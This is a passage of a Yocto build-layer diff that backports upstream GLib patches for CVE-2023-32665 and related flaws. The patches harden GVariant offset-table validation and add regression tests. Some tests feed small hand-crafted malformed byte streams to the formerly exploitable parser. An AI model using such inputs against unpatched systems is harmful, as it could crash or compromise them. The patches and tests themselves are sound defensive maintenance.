278+ * The second and third `ay`s must be given default values because of rule
279+ * “End Boundary Precedes Start Boundary”.
280+ *
281+ * The `i` must be given a default value because of rule “Start or End
282+ * Boundary of a Child Falls Outside the Container”.
283+ */
284+ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
285+ const guint8 data[] = {
286+ 0x01, 0x00, 0x02,
287+ /*
288+ ^──┘
289+
290+ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
291+ 2nd ay, bytes 2-0
292+ i, bytes 0-4
293+ 3rd ay, bytes 4-1
294+ ^^^^^^^^^^ Framing offsets
295+ */
296+ };
297+ gsize size = sizeof (data);
298+ GVariant *variant = NULL;
299+ GVariant *normal_variant = NULL;
300+ GVariant *expected = NULL;
301+
302+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
303+ g_assert_nonnull (variant);
304+
305+ g_assert_false (g_variant_is_normal_form (variant));
306+
307+ normal_variant = g_variant_get_normal_form (variant);
308+ g_assert_nonnull (normal_variant);
309+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
310+
311+ expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
312+ g_assert_cmpvariant (expected, variant);
313+ g_assert_cmpvariant (expected, normal_variant);
314+
315+ g_variant_unref (expected);
316+ g_variant_unref (normal_variant);
317+ g_variant_unref (variant);
318+}
319+
320+/* This is a regression test that overlapping entries in the offset table are
321+ * decoded consistently, even though they’re non-normal.
322+ *
323+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
324+static void
325+test_normal_checking_tuple_offsets4 (void)
326+{
327+ /* The expected decoding of this non-normal byte stream is complex. See
328+ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
329+ * specification.
330+ *
331+ * The rule “Child Values Overlapping Framing Offsets” from the specification
332+ * says that the first `ay` must be decoded as `[0x01]` even though it
333+ * overlaps the first byte of the offset table. However, since commit
334+ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
335+ * this as it’s exploitable. So the first `ay` must be given a default value.
336+ *
337+ * The second `ay` must be given a default value because of rule “End Boundary
338+ * Precedes Start Boundary”.
339+ *
340+ * The third `ay` must be given a default value because its framing offsets
341+ * overlap that of the first `ay`.
342+ */
343+ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
344+ const guint8 data[] = {
345+ 0x01, 0x00, 0x02,
346+ /*
347+ ^──┘
348+
349+ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
350+ 2nd ay, bytes 2-0
351+ 3rd ay, bytes 0-1
352+ ^^^^^^^^^^ Framing offsets
353+ */
354+ };
355+ gsize size = sizeof (data);
356+ GVariant *variant = NULL;
357+ GVariant *normal_variant = NULL;
358+ GVariant *expected = NULL;
359+
360+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
361+ g_assert_nonnull (variant);
362+
363+ g_assert_false (g_variant_is_normal_form (variant));
364+
365+ normal_variant = g_variant_get_normal_form (variant);
366+ g_assert_nonnull (normal_variant);
367+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
368+
369+ expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
370+ g_assert_cmpvariant (expected, variant);
371+ g_assert_cmpvariant (expected, normal_variant);
372+
373+ g_variant_unref (expected);
374+ g_variant_unref (normal_variant);
375+ g_variant_unref (variant);
376+}
377+
378 /* Test that an empty object path is normalised successfully to the base object
379 * path, ‘/’. */
380 static void
381@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
382 test_normal_checking_array_offsets2);
383 g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
384 test_normal_checking_tuple_offsets);
385+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
386+ test_normal_checking_tuple_offsets2);
387+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
388+ test_normal_checking_tuple_offsets3);
389+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
390+ test_normal_checking_tuple_offsets4);
391 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
392 test_normal_checking_empty_object_path);
393
394--
3952.24.4
396
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
new file mode 100644
index 0000000000..83d0205160
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
1From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 16 Aug 2023 03:42:47 +0000
4Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
5 directly
6
7This is equivalent to what `GVariantIter` does, but it means that
8`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
9calls.
10
11This will be useful in an upcoming commit, where those child values will
12be inspected a little more deeply.
13
14Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
15
16Helps: #2121
17
18CVE: CVE-2023-32665
19Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
20Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
21---
22 glib/gvariant.c | 7 +++----
23 1 file changed, 3 insertions(+), 4 deletions(-)
24
25diff --git a/glib/gvariant.c b/glib/gvariant.c
26index cdb428e..fdd36be 100644
27--- a/glib/gvariant.c
28+++ b/glib/gvariant.c
29@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
30 case G_VARIANT_CLASS_VARIANT:
31 {
32 GVariantBuilder builder;
33- GVariantIter iter;
34- GVariant *child;
35+ gsize i, n_children;
36
37 g_variant_builder_init (&builder, g_variant_get_type (value));
38- g_variant_iter_init (&iter, value);
39
40- while ((child = g_variant_iter_next_value (&iter)))
41+ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
42 {
43+ GVariant *child = g_variant_get_child_value (value, i);
44 g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
45 g_variant_unref (child);
46 }
47--
482.24.4
49
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
new file mode 100644
index 0000000000..f098548618
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
1From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 17 Aug 2023 01:30:38 +0000
4Subject: [PATCH] gvariant: Track checked and ordered offsets independently
5
6The past few commits introduced the concept of known-good offsets in the
7offset table (which is used for variable-width arrays and tuples).
8Good offsets are ones which are non-overlapping with all the previous
9offsets in the table.
10
11If a bad offset is encountered when indexing into the array or tuple,
12the cached known-good offset index will not be increased. In this way,
13all child variants at and beyond the first bad offset can be returned as
14default values rather than dereferencing potentially invalid data.
15
16In this case, there was no information about the fact that the indexes
17between the highest known-good index and the requested one had been
18checked already. That could lead to a pathological case where an offset
19table with an invalid first offset is repeatedly checked in full when
20trying to access higher-indexed children.
21
22Avoid that by storing the index of the highest checked offset in the
23table, as well as the index of the highest good/ordered offset.
24
25Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
26
27Helps: #2121
28
29CVE: CVE-2023-32665
30Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
31Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
32---
33 glib/gvariant-core.c | 28 ++++++++++++++++++++++++
34 glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
35 glib/gvariant-serialiser.h | 9 ++++++++
36 glib/gvariant.c | 1 +
37 glib/tests/gvariant.c | 5 +++++
38 5 files changed, 75 insertions(+), 12 deletions(-)
39
40diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
41index b951cd9..1b9d5cc 100644
42--- a/glib/gvariant-core.c
43+++ b/glib/gvariant-core.c
44@@ -67,6 +67,7 @@ struct _GVariant
45 GBytes *bytes;
46 gconstpointer data;
47 gsize ordered_offsets_up_to;
48+ gsize checked_offsets_up_to;
49 } serialised;
50
51 struct
52@@ -182,6 +183,24 @@ struct _GVariant
53 * This field is only relevant for arrays of non
54 * fixed width types and for tuples.
55 *
56+ * .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
57+ * the index of the highest element, n, whose frame
58+ * offsets (and all the preceding frame offsets)
59+ * have been checked for validity.
60+ *
61+ * It is always the case that
62+ * .checked_offsets_up_to ≥ .ordered_offsets_up_to.
63+ *
64+ * If .checked_offsets_up_to == .ordered_offsets_up_to,
65+ * then a bad offset has not been found so far.
66+ *
67+ * If .checked_offsets_up_to > .ordered_offsets_up_to,
68+ * then a bad offset has been found at
69+ * (.ordered_offsets_up_to + 1).
70+ *
71+ * This field is only relevant for arrays of non
72+ * fixed width types and for tuples.
73+ *
74 * .tree: Only valid when the instance is in tree form.
75 *
76 * Note that accesses from other threads could result in
77@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
78 value->size,
79 value->depth,
80 value->contents.serialised.ordered_offsets_up_to,
81+ value->contents.serialised.checked_offsets_up_to,
82 };
83 return serialised;
84 }
85@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
86 serialised.data = data;
87 serialised.depth = value->depth;
88 serialised.ordered_offsets_up_to = 0;
89+ serialised.checked_offsets_up_to = 0;
90
91 children = (gpointer *) value->contents.tree.children;
92 n_children = value->contents.tree.n_children;
93@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
94 if (value->state & STATE_SERIALISED)
95 {
96 serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
97+ serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
98 }
99 else
100 {
101 serialised->ordered_offsets_up_to = 0;
102+ serialised->checked_offsets_up_to = 0;
103 }
104
105 if (serialised->data)
106@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
107 value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
108 value->contents.serialised.bytes = bytes;
109 value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
110+ value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
111 value->state |= STATE_SERIALISED;
112 }
113 }
114@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
115 serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
116 serialised.depth = 0;
117 serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
118+ serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
119
120 if (!g_variant_serialised_check (serialised))
121 {
122@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
123 }
124
125 value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
126+ value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
127
128 g_clear_pointer (&owned_bytes, g_bytes_unref);
129
130@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
131
132 /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
133 value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
134+ value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
135
136 /* Check whether this would cause nesting too deep. If so, return a fake
137 * child. The only situation we expect this to happen in is with a variant,
138@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
139 g_bytes_ref (value->contents.serialised.bytes);
140 child->contents.serialised.data = s_child.data;
141 child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
142+ child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
143
144 return child;
145 }
146diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
147index cd4a3e6..0bf7243 100644
148--- a/glib/gvariant-serialiser.c
149+++ b/glib/gvariant-serialiser.c
150@@ -120,6 +120,8 @@
151 *
152 * @depth has no restrictions; the depth of a top-level serialised #GVariant is
153 * zero, and it increases for each level of nested child.
154+ *
155+ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
156 */
157
158 /* < private >
159@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
160 !(serialised.size == 0 || serialised.data != NULL))
161 return FALSE;
162
163+ if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
164+ return FALSE;
165+
166 /* Depending on the native alignment requirements of the machine, the
167 * compiler will insert either 3 or 7 padding bytes after the char.
168 * This will result in the sizeof() the struct being 12 or 16.
169@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
170 g_variant_type_info_ref (value.type_info);
171 value.depth++;
172 value.ordered_offsets_up_to = 0;
173+ value.checked_offsets_up_to = 0;
174
175 return value;
176 }
177@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
178 {
179 if (n_children)
180 {
181- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
182+ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
183
184 gvs_filler (&child, children[0]);
185 }
186@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
187 value.type_info = g_variant_type_info_element (value.type_info);
188 value.depth++;
189 value.ordered_offsets_up_to = 0;
190+ value.checked_offsets_up_to = 0;
191
192 return g_variant_serialised_is_normal (value);
193 }
194@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
195
196 value.depth++;
197 value.ordered_offsets_up_to = 0;
198+ value.checked_offsets_up_to = 0;
199
200 return value;
201 }
202@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
203 {
204 if (n_children)
205 {
206- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
207+ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
208
209 /* write the data for the child. */
210 gvs_filler (&child, children[0]);
211@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
212 value.size--;
213 value.depth++;
214 value.ordered_offsets_up_to = 0;
215+ value.checked_offsets_up_to = 0;
216
217 return g_variant_serialised_is_normal (value);
218 }
219@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
220
221 /* If the requested @index_ is beyond the set of indices whose framing offsets
222 * have been checked, check the remaining offsets to see whether they’re
223- * normal (in order, no overlapping array elements). */
224- if (index_ > value.ordered_offsets_up_to)
225+ * normal (in order, no overlapping array elements).
226+ *
227+ * Don’t bother checking if the highest known-good offset is lower than the
228+ * highest checked offset, as that means there’s an invalid element at that
229+ * index, so there’s no need to check further. */
230+ if (index_ > value.checked_offsets_up_to &&
231+ value.ordered_offsets_up_to == value.checked_offsets_up_to)
232 {
233 switch (offsets.offset_size)
234 {
235 case 1:
236 {
237 value.ordered_offsets_up_to = find_unordered_guint8 (
238- offsets.array, value.ordered_offsets_up_to, index_ + 1);
239+ offsets.array, value.checked_offsets_up_to, index_ + 1);
240 break;
241 }
242 case 2:
243 {
244 value.ordered_offsets_up_to = find_unordered_guint16 (
245- offsets.array, value.ordered_offsets_up_to, index_ + 1);
246+ offsets.array, value.checked_offsets_up_to, index_ + 1);
247 break;
248 }
249 case 4:
250 {
251 value.ordered_offsets_up_to = find_unordered_guint32 (
252- offsets.array, value.ordered_offsets_up_to, index_ + 1);
253+ offsets.array, value.checked_offsets_up_to, index_ + 1);
254 break;
255 }
256 case 8:
257 {
258 value.ordered_offsets_up_to = find_unordered_guint64 (
259- offsets.array, value.ordered_offsets_up_to, index_ + 1);
260+ offsets.array, value.checked_offsets_up_to, index_ + 1);
261 break;
262 }
263 default:
264 /* gvs_get_offset_size() only returns maximum 8 */
265 g_assert_not_reached ();
266 }
267+
268+ value.checked_offsets_up_to = index_;
269 }
270
271 if (index_ > value.ordered_offsets_up_to)
272@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
273
274 /* All offsets have now been checked. */
275 value.ordered_offsets_up_to = G_MAXSIZE;
276+ value.checked_offsets_up_to = G_MAXSIZE;
277
278 return TRUE;
279 }
280@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
281 * all the tuple *elements* here, not just all the framing offsets, since
282 * tuples contain a mix of elements which use framing offsets and ones which
283 * don’t. None of them are allowed to overlap. */
284- if (index_ > value.ordered_offsets_up_to)
285+ if (index_ > value.checked_offsets_up_to &&
286+ value.ordered_offsets_up_to == value.checked_offsets_up_to)
287 {
288 gsize i, prev_i_end = 0;
289
290- if (value.ordered_offsets_up_to > 0)
291- gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
292+ if (value.checked_offsets_up_to > 0)
293+ gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
294
295- for (i = value.ordered_offsets_up_to; i <= index_; i++)
296+ for (i = value.checked_offsets_up_to; i <= index_; i++)
297 {
298 gsize i_start, i_end;
299
300@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
301 }
302
303 value.ordered_offsets_up_to = i - 1;
304+ value.checked_offsets_up_to = index_;
305 }
306
307 if (index_ > value.ordered_offsets_up_to)
308@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
309
310 /* All element bounds have been checked above. */
311 value.ordered_offsets_up_to = G_MAXSIZE;
312+ value.checked_offsets_up_to = G_MAXSIZE;
313
314 {
315 gsize fixed_size;
316diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
317index 144aec8..e132451 100644
318--- a/glib/gvariant-serialiser.h
319+++ b/glib/gvariant-serialiser.h
320@@ -40,6 +40,15 @@ typedef struct
321 * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
322 * rather than an index into the frame offsets. */
323 gsize ordered_offsets_up_to;
324+
325+ /* Similar to @ordered_offsets_up_to. This gives the index of the child element
326+ * whose frame offset is the highest in the offset table which has been
327+ * checked so far.
328+ *
329+ * This is always ≥ @ordered_offsets_up_to. It is always an element index.
330+ *
331+ * See documentation in gvariant-core.c for `struct GVariant` for details. */
332+ gsize checked_offsets_up_to;
333 } GVariantSerialised;
334
335 /* deserialisation */
336diff --git a/glib/gvariant.c b/glib/gvariant.c
337index fdd36be..f910bd4 100644
338--- a/glib/gvariant.c
339+++ b/glib/gvariant.c
340@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
341 serialised.size = g_variant_get_size (trusted);
342 serialised.data = g_malloc (serialised.size);
343 serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
344+ serialised.checked_offsets_up_to = G_MAXSIZE;
345 g_variant_store (trusted, serialised.data);
346 g_variant_unref (trusted);
347
348diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
349index a84b02e..640f3c0 100644
350--- a/glib/tests/gvariant.c
351+++ b/glib/tests/gvariant.c
352@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
353
354 serialised->depth = 0;
355 serialised->ordered_offsets_up_to = 0;
356+ serialised->checked_offsets_up_to = 0;
357
358 g_assert_true (serialised->type_info == instance->type_info);
359 g_assert_cmpuint (serialised->size, ==, instance->size);
360@@ -1453,6 +1454,7 @@ test_maybe (void)
361 serialised.size = needed_size;
362 serialised.depth = 0;
363 serialised.ordered_offsets_up_to = 0;
364+ serialised.checked_offsets_up_to = 0;
365
366 g_variant_serialiser_serialise (serialised,
367 random_instance_filler,
368@@ -1577,6 +1579,7 @@ test_array (void)
369 serialised.size = needed_size;
370 serialised.depth = 0;
371 serialised.ordered_offsets_up_to = 0;
372+ serialised.checked_offsets_up_to = 0;
373
374 g_variant_serialiser_serialise (serialised, random_instance_filler,
375 (gpointer *) instances, n_children);
376@@ -1742,6 +1745,7 @@ test_tuple (void)
377 serialised.size = needed_size;
378 serialised.depth = 0;
379 serialised.ordered_offsets_up_to = 0;
380+ serialised.checked_offsets_up_to = 0;
381
382 g_variant_serialiser_serialise (serialised, random_instance_filler,
383 (gpointer *) instances, n_children);
384@@ -1839,6 +1843,7 @@ test_variant (void)
385 serialised.size = needed_size;
386 serialised.depth = 0;
387 serialised.ordered_offsets_up_to = 0;
388+ serialised.checked_offsets_up_to = 0;
389
390 g_variant_serialiser_serialise (serialised, random_instance_filler,
391 (gpointer *) &instance, 1);
392--
3932.24.4
394
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
new file mode 100644
index 0000000000..a523e60b91
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
1From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 17 Aug 2023 01:39:01 +0000
4Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
5
6The following few commits will add a couple of new fields to
7`GVariantSerialised`, and they should be zero-filled by default.
8
9Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
10default in a few places.
11
12Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
13
14Helps: #2121
15
16CVE: CVE-2023-32665
17Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
18Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
19---
20 glib/gvariant.c | 2 +-
21 glib/tests/gvariant.c | 12 ++++++------
22 2 files changed, 7 insertions(+), 7 deletions(-)
23
24diff --git a/glib/gvariant.c b/glib/gvariant.c
25index f910bd4..8ba701e 100644
26--- a/glib/gvariant.c
27+++ b/glib/gvariant.c
28@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
29 if (alignment)
30 /* (potentially) contains multi-byte numeric data */
31 {
32- GVariantSerialised serialised;
33+ GVariantSerialised serialised = { 0, };
34 GVariant *trusted;
35 GBytes *bytes;
36
37diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
38index 640f3c0..d640c81 100644
39--- a/glib/tests/gvariant.c
40+++ b/glib/tests/gvariant.c
41@@ -1446,7 +1446,7 @@ test_maybe (void)
42
43 for (flavour = 0; flavour < 8; flavour += alignment)
44 {
45- GVariantSerialised serialised;
46+ GVariantSerialised serialised = { 0, };
47 GVariantSerialised child;
48
49 serialised.type_info = type_info;
50@@ -1572,7 +1572,7 @@ test_array (void)
51
52 for (flavour = 0; flavour < 8; flavour += alignment)
53 {
54- GVariantSerialised serialised;
55+ GVariantSerialised serialised = { 0, };
56
57 serialised.type_info = array_info;
58 serialised.data = flavoured_malloc (needed_size, flavour);
59@@ -1738,7 +1738,7 @@ test_tuple (void)
60
61 for (flavour = 0; flavour < 8; flavour += alignment)
62 {
63- GVariantSerialised serialised;
64+ GVariantSerialised serialised = { 0, };
65
66 serialised.type_info = type_info;
67 serialised.data = flavoured_malloc (needed_size, flavour);
68@@ -1835,7 +1835,7 @@ test_variant (void)
69
70 for (flavour = 0; flavour < 8; flavour += alignment)
71 {
72- GVariantSerialised serialised;
73+ GVariantSerialised serialised = { 0, };
74 GVariantSerialised child;
75
76 serialised.type_info = type_info;
77@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance *tree,
78 static void
79 test_byteswap (void)
80 {
81- GVariantSerialised one, two;
82+ GVariantSerialised one = { 0, }, two = { 0, };
83 TreeInstance *tree;
84
85 tree = tree_instance_new (NULL, 3);
86@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
87 static void
88 test_fuzz (gdouble *fuzziness)
89 {
90- GVariantSerialised serialised;
91+ GVariantSerialised serialised = { 0, };
92 TreeInstance *tree;
93
94 /* make an instance */
95--
962.24.4
97
diff --git a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 1a006b9f38..60a6b843c1 100644
--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -18,6 +18,44 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
18 file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \ 18 file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
19 file://tzdata-update.patch \ 19 file://tzdata-update.patch \
20 file://CVE-2020-35457.patch \ 20 file://CVE-2020-35457.patch \
21 file://CVE-2021-27218.patch \
22 file://CVE-2021-27219-01.patch \
23 file://CVE-2021-27219-02.patch \
24 file://CVE-2021-27219-03.patch \
25 file://CVE-2021-27219-04.patch \
26 file://CVE-2021-27219-05.patch \
27 file://CVE-2021-27219-06.patch \
28 file://CVE-2021-27219-07.patch \
29 file://CVE-2021-27219-08.patch \
30 file://CVE-2021-27219-09.patch \
31 file://CVE-2021-27219-10.patch \
32 file://CVE-2021-27219-11.patch \
33 file://CVE-2021-27219-reg1-1.patch \
34 file://CVE-2021-27219-reg1-2.patch \
35 file://CVE-2021-27219-reg1-4.patch \
36 file://CVE-2021-27219-reg1-5.patch \
37 file://CVE-2021-27219-reg2-1.patch \
38 file://CVE-2021-27219-reg2-2.patch \
39 file://CVE-2021-27219-reg2-3.patch \
40 file://CVE-2021-28153-1.patch \
41 file://CVE-2021-28153-2.patch \
42 file://CVE-2021-28153-3.patch \
43 file://CVE-2021-28153-4.patch \
44 file://CVE-2021-28153-5.patch \
45 file://CVE-2023-32665-0001.patch \
46 file://CVE-2023-32665-0002.patch \
47 file://CVE-2023-32665-0003.patch \
48 file://CVE-2023-32665-0004.patch \
49 file://CVE-2023-32665-0005.patch \
50 file://CVE-2023-32665-0006.patch \
51 file://CVE-2023-32665-0007.patch \
52 file://CVE-2023-32665-0008.patch \
53 file://CVE-2023-32665-0009.patch \
54 file://CVE-2023-29499.patch \
55 file://CVE-2023-32611-0001.patch \
56 file://CVE-2023-32611-0002.patch \
57 file://CVE-2023-32643.patch \
58 file://CVE-2023-32636.patch \
21 " 59 "
22 60
23SRC_URI_append_class-native = " file://relocate-modules.patch" 61SRC_URI_append_class-native = " file://relocate-modules.patch"
diff --git a/meta/recipes-core/glib-2.0/glib.inc b/meta/recipes-core/glib-2.0/glib.inc
index c3ddf18387..1849a6e05c 100644
--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
4 4
5# pcre is under BSD; 5# pcre is under BSD;
6# docs/reference/COPYING is with a 'public domain'-like license! 6# docs/reference/COPYING is with a 'public domain'-like license!
7LICENSE = "LGPLv2.1+ & BSD & PD" 7LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
8LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ 8LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
9 file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \ 9 file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
10 file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \ 10 file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
index 24de55d929..9aa24eccfe 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
20FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:" 20FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
21 21
22SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ 22SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
23 git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \ 23 git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
24 \ 24 \
25 file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \ 25 file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
26 \ 26 \
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 5f726537ff..95e2bba301 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
1SRCBRANCH ?= "release/2.31/master" 1SRCBRANCH ?= "release/2.31/master"
2PV = "2.31+git${SRCPV}" 2PV = "2.31+git${SRCPV}"
3SRCREV_glibc ?= "df31c7ca927242d5d4eee97f93a01e23ff47e332" 3SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
